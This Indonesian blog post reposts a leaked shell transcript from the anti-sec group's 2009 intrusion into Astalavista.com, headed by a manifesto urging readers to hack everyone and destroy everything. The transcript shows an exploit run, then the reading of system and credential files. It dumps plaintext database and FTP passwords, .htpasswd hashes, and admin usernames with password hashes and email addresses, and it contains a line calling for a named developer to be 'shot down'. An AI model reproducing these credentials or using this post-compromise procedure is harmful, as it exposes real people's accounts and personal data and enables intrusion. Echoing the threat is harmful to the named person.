_____  __     _____  ___    _____  ___    _____  _____  _____  _____  _____  _____    _____  _____    ____   _____  _ _ _  _____ 
|   __||  |   |  |  ||_  |  |   | || | |  |   __||   __|| __  ||  |  ||   __|| __  |  |     ||   __|  |    \ |     || | | ||   | |
|   __||  |__ |  |  | _| |_ | | | ||_  |  |__   ||   __||    -||  |  ||   __||    -|  |-   -||__   |  |  |  ||  |  || | | || | | |
|_____||_____| \___/ |_____||_|___|  |_|  |_____||_____||__|__| \___/ |_____||__|__|  |_____||_____|  |____/ |_____||_____||_|___|
               I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE 

	 						
							                                  , ----.       ~ Fuck full-disclosure
							                              -  -     `        ~ Fuck the security industry
							                        ,__.,'           \      ~ Keep 0days private
							                      .'                 *`     ~ Hack everyone you can and then hack some more
							                     /       |   |     / **\    ~ Blend in.
							                    .                 / ****.   ~ Get trusted.
							                    |    mm           | ****|   ~ Trust no one.
							                     \                | ****|   ~ Own everyone.
							                      ` ._______      \ ****/   ~ Disclose nothing.
							                               \      /`---'    ~ Destroy everything.
							                                 \___(          ~ Take back the scene
							                                 /~~~~\         ~ Never sell out, never surrender.
							                                /      \        ~ Get in as anonymous, Leave with no trace.
							                               /      | \       ~ This your Fucking IP 
							                              |       |  \      ~ This your Fucking ISP  
							                    , ~~ .    |, ~~ . |  |\     ~ FUCK OFF I've got enough friends !!!!
							                   ( |||| )   ( |||| )(,,,)`    
							                  ( |||||| )-( |||||| )    | ^
							                  ( |||||| ) ( |||||| )    |'/
							                  ( |||||| )-( |||||| )___,'-
							                   ( |||| )   ( |||| )
							                    ` ~~ '     ` ~~ '











 



    

      
[ Blog ]

      
      
[ History ]

    

    

      

      







ASTALAVISTA DI HAJAR HABIS - HABISAN

situs security dan hacking yang berdiri pada tahun 2001 ini memang begitu tidak asing lagi bagi kalangan IT Profesional ataupun kalangan peretas [script kiddies]. 

dalam ajang audit site ,sampai dengan explorasi security system terbuka dalam FORUM ASTALAVISTA ini . Dan pada kali ini baru saja situs yang tepatnya beralamat di http://astalavista.com di susupi oleh HACKER yang profesional yang bernama anti-sec group 

wah wah . . serem juga yah . team yang berhasil melumpuhkan situs http://milw0rm.com Hackforums.net  dan pada tanggal 10 Juli 2009 juga menyerang situs penyedia layanan upload gambar http://imageshack.us .. 

heuheuheuheu :P 

dalam aksinya si attacker mampu menyentuh semua system dalam nya . 

dalam Akses R00tnya si attacker mencoba membedah semua isi dalam site tersebut .



kita lihat dalam metode yang di lakukan si attacker yang hebat ini

============================================================

anti-sec:~# ./g0tshell astalavista.com -p 80

	[+] Connecting to astalavista.com:80

	[+] Grabbing banner...

		LiteSpeed

	[+] Injecting shellcode...

	[-] Wait for it

	

	[~] We g0tshell

		uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

		ID: uid=100(apache) gid=500(apache) groups=500(apache)

	

sh-3.2$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

named:x:25:25:Named:/var/named:/sbin/nologin

apache:x:100:500::/var/www:/bin/false

diradmin:x:101:101::/usr/local/directadmin:/bin/bash

mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash

webapps:x:500:501::/var/www/html:/bin/bash

majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash

admin:x:501:502::/home/admin:/bin/bash

jon:x:502:503::/home/jon:/bin/bash

com:x:503:504::/home/com:/bin/bash

ntp:x:38:38::/etc/ntp:/sbin/nologin

ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin

astanet:x:504:505::/home/astanet:/bin/bash

avahi:x:70:70:Avahi daemon:/:/sbin/nologin

avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin



sh-3.2$ cat /etc/hosts

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1       localhost.localdomain   localhost

::1     localhost6.localdomain6 localhost6

80.74.154.172           asta1.astalavistaserver.com



sh-3.2$ pwd

/home/com/public_html



sh-3.2$ ls -la

total 18460

drwxr-xr-x 30 com apache     4096 May 28 17:06 .

drwx--x--x 11 com com        4096 Jun 25  2008 ..

drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin

drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache

drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin

drwxrwxrwx  2 com com        4096 May 19 00:50 config

drwxr-xr-x  2 com com        4096 Mar 20 11:05 core

drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules

drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing

drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo

drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__

-rw-r--r--  1 com com        8035 May 19 14:26 directory_to_mediadir.php

drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd

drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor

-rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico

drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed

-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess

-rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak

-rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak

drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool

drwxrwxrwx 14 com com        4096 Feb  2 19:29 images

-rw-r--r--  1 com com       97496 Jun  2 13:01 index.php

drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer

drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang

drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib

drwxrwxrwx 12 com com        4096 Jun  2 07:47 media

drwxr-xr-x  8 com com        4096 May 11 12:48 modifications

drwxr-xr-x 34 com com        4096 May 28 16:30 modules

drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin

drwxrwxr-x 22 com com        4096 May 28 17:06 _new

drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old

drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy

drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy

-rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt

-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml

-rw-r--r--  1 com com         223 Mar 30 15:32 test.php

drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes

drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp

drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam



sh-3.2$ head -20 index.php



/**

 * The main page for the CMS

 * @copyright   CONTREXX CMS - COMVATION AG

 * @author      Comvation Development Team

 * @version     v1.0.9.10.1 stable

 * @package        contrexx

 * @subpackage    core

 * @link        http://www.contrexx.com/ contrexx homepage

 * @since       v0.0.0.0

 * @todo        Capitalize all class names in project

 * @uses        /config/configuration.php

 * @uses        /config/settings.php

 * @uses        /config/version.php

 * @uses        /core/API.php

 * @uses        /core_modules/cache/index.class.php

 * @uses        /core/error.class.php

 * @uses        /core_modules/banner/index.class.php

 * @uses        /core_modules/contact/index.class.php

 

sh-3.2$ cd config/

sh-3.2$ ls -la

total 32

drwxrwxrwx  2 com com    4096 May 19 00:50 .

drwxr-xr-x 30 com apache 4096 May 28 17:06 ..

-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php

-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php

-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php

-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php



sh-3.2$ cat configuration.php

[snip]

$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost

$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name

$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix

$_DBCONFIG['user'] = 'contrexxuser2'; // Database username

$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password

$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)

$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)

[snip]

$_FTPCONFIG['is_activated'] = true; // Ftp support true or false

$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode

$_FTPCONFIG['host']     = 'localhost';// This is normally set to localhost

$_FTPCONFIG['port'] = 21; // Ftp remote port

$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username

$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password

$_FTPCONFIG['path']     = '/'; // Ftp path to cms



sh-3.2$ cd ..

sh-3.2$ cd dvd/

sh-3.2$ ls -la

total 2913780

drwxr-xr-x  2 com com          4096 Sep  9  2008 .

drwxr-xr-x 30 com apache       4096 May 28 17:06 ..

-rw-r--r--  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar

-rw-r--r--  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar

-rw-r--r--  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar

-rw-r--r--  1 com com           115 Jan 29  2008 .htaccess



sh-3.2$ cat .htaccess

authType Basic

authName DVD

authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd

require valid-user



sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd

DVDdownload:CRD8cuY6.MPT6

DVDdownload2:CR8a36.wluFMg



sh-3.2$ cat test.php

$url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9

pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';

$url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url)));

echo $url;

?>



sh-3.2$ cd modifications/

sh-3.2$ ls -la

total 32

drwxr-xr-x  8 com com    4096 May 11 12:48 .

drwxr-xr-x 30 com apache 4096 May 28 17:06 ..

drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng

drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs

drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools

drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc

drwxr-xr-x  2 com com    4096 Feb  2 19:33 search

drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp



sh-3.2$ ls -R

.:

com_avtng  cronjobs  onlinetools  pjirc  search  _tmp



./com_avtng:

avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts



./com_avtng/scripts:

popunder.js



./cronjobs:

exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp



./cronjobs/tmp:

contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv



./onlinetools:

index.php



./pjirc:

a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt

AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt

background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd



./pjirc/img:

ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif

arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif    

verre-eau.gif

argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif   

verre-vin.gif

ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif

biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif



./pjirc/snd:

bell2.au  ding.au



./search:

searchEngines.php  search.php



./_tmp:

defaultPorts.php  defaultPorts.txt



sh-3.2$ cd cronjobs/

sh-3.2$ cat exploits.php

[snip]

$categories   = array();

$milw0rmFile  = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';

$expolits     = file($milw0rmFile);

$comExploits  = array();

[snip]

// manage data

for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640



    // get path and title

    $expolits[$x] = trim($expolits[$x]);

    $path         = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));

    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);



    // check if file exists

    if (file_exists($path)) {



        $text = file_get_contents($path);



        // get content and date

        //$text = htmlspecialchars($text, ENT_QUOTES);

        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-8"));

        if ($tmptext != '') {

            $text = $tmptext;

        } else {

            $text = addslashes(htmlentities($text,  ENT_QUOTES));

        }

        $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));

        $tmp  = explode('-', $date);

        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));

        $cat  = getCategory ($path);

        $ext  = pathinfo(basename($path));

        $ext  = $ext['extension'];

        $qStr = "

            SELECT  `id`

            FROM    `contrexx_module_exploits`

            WHERE   `title`  =  '" . $title . "'

            AND     `date`   =  '" . $date . "'

        ";

        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";

        $q = $_objDB->query($qStr);



        if ($q->numRows() == 0) {



            // prepare array

            $comExploits[$x]['date']      = $date;

            $comExploits[$x]['title']     = $title;

            $comExploits[$x]['author']    = 'milw0rm';

            $comExploits[$x]['text']      = $text;

            $comExploits[$x]['source']    = $ext;

            $comExploits[$x]['url1']      = '';

            $comExploits[$x]['url2']      = '';

            $comExploits[$x]['catid']     = $cat;

            $comExploits[$x]['lang']      = '2';

            $comExploits[$x]['userid']    = '12';

            $comExploits[$x]['startdate'] = '0000-00-00';

            $comExploits[$x]['enddate']   = '0000-00-00';

            $comExploits[$x]['status']    = '1';

            $comExploits[$x]['changelog'] = $date;



        }

[snip]

    $xml = '



    

        ASTALAVISTA.com - Exploits

        http://www.astalavista.com/exploits

        All availably Exploits.

        en-us

        ' . date('F, j M Y H:i:s O') . '

        http://blogs.law.harvard.edu/tech/rss

        Astalavista.com

        info@astalavista.com' . $items . '

    



';





    if (file_exists(FULLPATH . '/feed/exploits.xml')) {

        unlink (FULLPATH . '/feed/exploits.xml');

    }





    file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);

[snip]



sh-3.2$ cat exploits.sh

#!/bin/sh

###########################################################

#                                                         #

#   Title:        milw0rm exploits adder                  #

#   Description:  Add all milw0rm exploits to the         #

#                 Astalavista.com database                #

#                                                         #

#   Company:      Astalavista Group                       #

#   Author:       Paulo M. Santos                         #

#   E-Mail:       paulo.santos@astalavista.ch             #

#                                                         #

###########################################################





# path

this_path=/home/com/public_html/modifications/cronjobs



# change directory

cd $this_path

cd tmp/



# delete files

rm -rf milw0rm.tar.* &

rm -rf milw0rm/ &



# wget milw0rm paket

wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2



# extract milw0rm paket

tar -xvf milw0rm.tar.bz2



# change owner

chown -R com .

chgrp -R com .



# execute php script

cd $this_path

php -q exploits.php



# delete files

rm -rf tmp/milw0rm.tar.*

rm -rf tmp/milw0rm/



sh-3.2$ echo "Paulo M. Santos needs to be shot down."

Paulo M. Santos needs to be shot down.



mysql -u contrexxuser2 -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 261694

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| com_contrexx2      |

| com_contrexx2_live |

| test               |

+--------------------+

4 rows in set (0.00 sec)



mysql> use com_contrexx2_live

Database changed

mysql> show tables;

+--------------------------------------------------+

| Tables_in_com_contrexx2_live                     |

+--------------------------------------------------+

| cc_banner_counter                                |

| cc_search_counter                                |

| contrexx_access_group_dynamic_ids                |

| contrexx_access_group_static_ids                 |

| contrexx_access_rel_user_group                   |

| contrexx_access_settings                         |

| contrexx_access_user_attribute                   |

| contrexx_access_user_attribute_name              |

| contrexx_access_user_attribute_value             |

| contrexx_access_user_core_attribute              |

| contrexx_access_user_groups                      |

| contrexx_access_user_mail                        |

| contrexx_access_user_profile                     |

| contrexx_access_user_title                       |

| contrexx_access_user_validity                    |

| contrexx_access_users                            |

| contrexx_backend_areas                           |

| contrexx_backups                                 |

| contrexx_content                                 |

| contrexx_content_history                         |

| contrexx_content_logfile                         |

| contrexx_content_navigation                      |

| contrexx_content_navigation_history              |

| contrexx_ids                                     |

| contrexx_languages                               |

| contrexx_lib_country                             |

| contrexx_log                                     |

| contrexx_module_alias_source                     |

| contrexx_module_alias_target                     |

| contrexx_module_block_blocks                     |

| contrexx_module_block_rel_lang                   |

| contrexx_module_block_rel_pages                  |

| contrexx_module_block_settings                   |

| contrexx_module_blog_categories                  |

| contrexx_module_blog_comments                    |

| contrexx_module_blog_message_to_category         |

| contrexx_module_blog_messages                    |

| contrexx_module_blog_messages_lang               |

| contrexx_module_blog_networks                    |

| contrexx_module_blog_networks_lang               |

| contrexx_module_blog_settings                    |

| contrexx_module_blog_votes                       |

| contrexx_module_calendar                         |

| contrexx_module_calendar_access                  |

| contrexx_module_calendar_categories              |

| contrexx_module_calendar_form_data               |

| contrexx_module_calendar_form_fields             |

| contrexx_module_calendar_registrations           |

| contrexx_module_calendar_settings                |

| contrexx_module_calendar_style                   |

| contrexx_module_contact_form                     |

| contrexx_module_contact_form_data                |

| contrexx_module_contact_form_field               |

| contrexx_module_contact_settings                 |

| contrexx_module_data_categories                  |

| contrexx_module_data_message_to_category         |

| contrexx_module_data_messages                    |

| contrexx_module_data_messages_lang               |

| contrexx_module_data_placeholders                |

| contrexx_module_data_settings                    |

| contrexx_module_directory_access                 |

| contrexx_module_directory_categories             |

| contrexx_module_directory_dir                    |

| contrexx_module_directory_inputfields            |

| contrexx_module_directory_levels                 |

| contrexx_module_directory_mail                   |

| contrexx_module_directory_rel_dir_cat            |

| contrexx_module_directory_rel_dir_level          |

| contrexx_module_directory_settings               |

| contrexx_module_directory_settings_google        |

| contrexx_module_directory_vote                   |

| contrexx_module_docsys                           |

| contrexx_module_docsys_categories                |

| contrexx_module_egov_configuration               |

| contrexx_module_egov_orders                      |

| contrexx_module_egov_product_calendar            |

| contrexx_module_egov_product_fields              |

| contrexx_module_egov_products                    |

| contrexx_module_egov_settings                    |

| contrexx_module_exploits                         |

| contrexx_module_exploits_categories              |

| contrexx_module_feed_category                    |

| contrexx_module_feed_news                        |

| contrexx_module_feed_newsml_association          |

| contrexx_module_feed_newsml_categories           |

| contrexx_module_feed_newsml_documents            |

| contrexx_module_feed_newsml_providers            |

| contrexx_module_forum_access                     |

| contrexx_module_forum_categories                 |

| contrexx_module_forum_categories_lang            |

| contrexx_module_forum_notification               |

| contrexx_module_forum_postings                   |

| contrexx_module_forum_rating                     |

| contrexx_module_forum_settings                   |

| contrexx_module_forum_statistics                 |

| contrexx_module_gallery_categories               |

| contrexx_module_gallery_comments                 |

| contrexx_module_gallery_language                 |

| contrexx_module_gallery_language_pics            |

| contrexx_module_gallery_pictures                 |

| contrexx_module_gallery_settings                 |

| contrexx_module_gallery_votes                    |

| contrexx_module_guestbook                        |

| contrexx_module_guestbook_settings               |

| contrexx_module_livecam                          |

| contrexx_module_livecam_settings                 |

| contrexx_module_market                           |

| contrexx_module_market_access                    |

| contrexx_module_market_categories                |

| contrexx_module_market_mail                      |

| contrexx_module_market_paypal                    |

| contrexx_module_market_settings                  |

| contrexx_module_market_spez_fields               |

| contrexx_module_mediadir_access                  |

| contrexx_module_mediadir_categories              |

| contrexx_module_mediadir_comments                |

| contrexx_module_mediadir_dir                     |

| contrexx_module_mediadir_inputfields             |

| contrexx_module_mediadir_levels                  |

| contrexx_module_mediadir_mail                    |

| contrexx_module_mediadir_rel_dir_cat             |

| contrexx_module_mediadir_rel_dir_level           |

| contrexx_module_mediadir_reports                 |

| contrexx_module_mediadir_settings                |

| contrexx_module_mediadir_settings_google         |

| contrexx_module_mediadir_vote                    |

| contrexx_module_memberdir_directories            |

| contrexx_module_memberdir_name                   |

| contrexx_module_memberdir_settings               |

| contrexx_module_memberdir_values                 |

| contrexx_module_nettools_allowed_groups          |

| contrexx_module_nettools_settings                |

| contrexx_module_news                             |

| contrexx_module_news_access                      |

| contrexx_module_news_categories                  |

| contrexx_module_news_settings                    |

| contrexx_module_news_teaser_frame                |

| contrexx_module_news_teaser_frame_templates      |

| contrexx_module_news_ticker                      |

| contrexx_module_newsletter                       |

| contrexx_module_newsletter_attachment            |

| contrexx_module_newsletter_category              |

| contrexx_module_newsletter_confirm_mail          |

| contrexx_module_newsletter_rel_cat_news          |

| contrexx_module_newsletter_rel_user_cat          |

| contrexx_module_newsletter_settings              |

| contrexx_module_newsletter_template              |

| contrexx_module_newsletter_tmp_sending           |

| contrexx_module_newsletter_user                  |

| contrexx_module_newsletter_user_title            |

| contrexx_module_onlinetools_defaultports         |

| contrexx_module_onlinetools_defaultports_back    |

| contrexx_module_onlinetools_geolitecity_blocks   |

| contrexx_module_onlinetools_geolitecity_country  |

| contrexx_module_onlinetools_geolitecity_location |

| contrexx_module_podcast_category                 |

| contrexx_module_podcast_medium                   |

| contrexx_module_podcast_rel_category_lang        |

| contrexx_module_podcast_rel_medium_category      |

| contrexx_module_podcast_settings                 |

| contrexx_module_podcast_template                 |

| contrexx_module_proxydb                          |

| contrexx_module_recommend                        |

| contrexx_module_repository                       |

| contrexx_module_securitynews_cats                |

| contrexx_module_securitynews_feeds               |

| contrexx_module_securitynews_news                |

| contrexx_module_shop_categories                  |

| contrexx_module_shop_config                      |

| contrexx_module_shop_countries                   |

| contrexx_module_shop_currencies                  |

| contrexx_module_shop_customers                   |

| contrexx_module_shop_importimg                   |

| contrexx_module_shop_lsv                         |

| contrexx_module_shop_mail                        |

| contrexx_module_shop_mail_content                |

| contrexx_module_shop_manufacturer                |

| contrexx_module_shop_order_items                 |

| contrexx_module_shop_order_items_attributes      |

| contrexx_module_shop_orders                      |

| contrexx_module_shop_payment                     |

| contrexx_module_shop_payment_processors          |

| contrexx_module_shop_pricelists                  |

| contrexx_module_shop_products                    |

| contrexx_module_shop_products_attributes         |

| contrexx_module_shop_products_attributes_name    |

| contrexx_module_shop_products_attributes_value   |

| contrexx_module_shop_products_downloads          |

| contrexx_module_shop_rel_countries               |

| contrexx_module_shop_rel_payment                 |

| contrexx_module_shop_rel_shipment                |

| contrexx_module_shop_shipment_cost               |

| contrexx_module_shop_shipper                     |

| contrexx_module_shop_vat                         |

| contrexx_module_shop_zones                       |

| contrexx_module_u2u_address_list                 |

| contrexx_module_u2u_message_log                  |

| contrexx_module_u2u_sent_messages                |

| contrexx_module_u2u_settings                     |

| contrexx_module_u2u_user_log                     |

| contrexx_modules                                 |

| contrexx_sessions                                |

| contrexx_settings                                |

| contrexx_settings_smtp                           |

| contrexx_skins                                   |

| contrexx_stats_browser                           |

| contrexx_stats_colourdepth                       |

| contrexx_stats_config                            |

| contrexx_stats_country                           |

| contrexx_stats_hostname                          |

| contrexx_stats_javascript                        |

| contrexx_stats_operatingsystem                   |

| contrexx_stats_referer                           |

| contrexx_stats_requests                          |

| contrexx_stats_requests_summary                  |

| contrexx_stats_screenresolution                  |

| contrexx_stats_search                            |

| contrexx_stats_spiders                           |

| contrexx_stats_spiders_summary                   |

| contrexx_stats_visitors                          |

| contrexx_stats_visitors_summary                  |

| contrexx_voting_additionaldata                   |

| contrexx_voting_email                            |

| contrexx_voting_rel_email_system                 |

| contrexx_voting_results                          |

| contrexx_voting_system                           |

| foo                                              |

+--------------------------------------------------+

227 rows in set (0.01 sec)



mysql> select count(*) as skids from contrexx_access_users;

+-------+

| skids |

+-------+

| 53699 |

+-------+

1 row in set (0.00 sec)



mysql> describe contrexx_access_users;

+------------------+------------------------------------------+------+-----+--------------+----------------+

| Field            | Type                                     | Null | Key | Default      | Extra          |

+------------------+------------------------------------------+------+-----+--------------+----------------+

| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |

| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |

| username         | varchar(40)                              | YES  | MUL | NULL         |                |

| password         | varchar(32)                              | YES  |     | NULL         |                |

| regdate          | int(14) unsigned                         | NO   |     | 0            |                |

| expiration       | int(14) unsigned                         | NO   |     | 0            |                |

| validity         | int(10) unsigned                         | NO   |     | 0            |                |

| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |

| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |

| email            | varchar(255)                             | YES  |     | NULL         |                |

| email_access     | enum('everyone','members_only','nobody') | NO   |     | nobody       |                |

| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |

| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |

| active           | tinyint(1)                               | NO   |     | 0            |                |

| profile_access   | enum('everyone','members_only','nobody') | NO   |     | members_only |                |

| restore_key      | varchar(32)                              | NO   |     |              |                |

| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |

| u2u_active       | enum('0','1')                            | NO   |     | 1            |                |

+------------------+------------------------------------------+------+-----+--------------+----------------+

18 rows in set (0.00 sec)



mysql> select username,password,email from contrexx_access_users where is_admin = 1;

+------------+----------------------------------+-----------------------------+

| username   | password                         | email                       |

+------------+----------------------------------+-----------------------------+

| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |

| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |

| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |

| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |

+------------+----------------------------------+-----------------------------+

4 rows in set (0.04 sec)



mysql> exit;

Bye

================================================================



waduhhhh... pass admin udah di temuin deh . tapi mau di apain lagi toh si attacker sudah dapet akses r00t .

heuheuheuheu :P LANJUT ..



=================================================================

sh-3.2$ ls -la ~astanet

total 48

drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .

drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..

drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth

-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history

-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout

-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile

-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc

drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains

drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap

drwx------  2 astanet astanet 4096 Dec 23 12:18 mail

lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html

-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow



sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/

sh-3.2$ ls -la

total 200

drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .

drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..

drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007

drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql

drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 astanet@astalavista.com

drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend

drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner

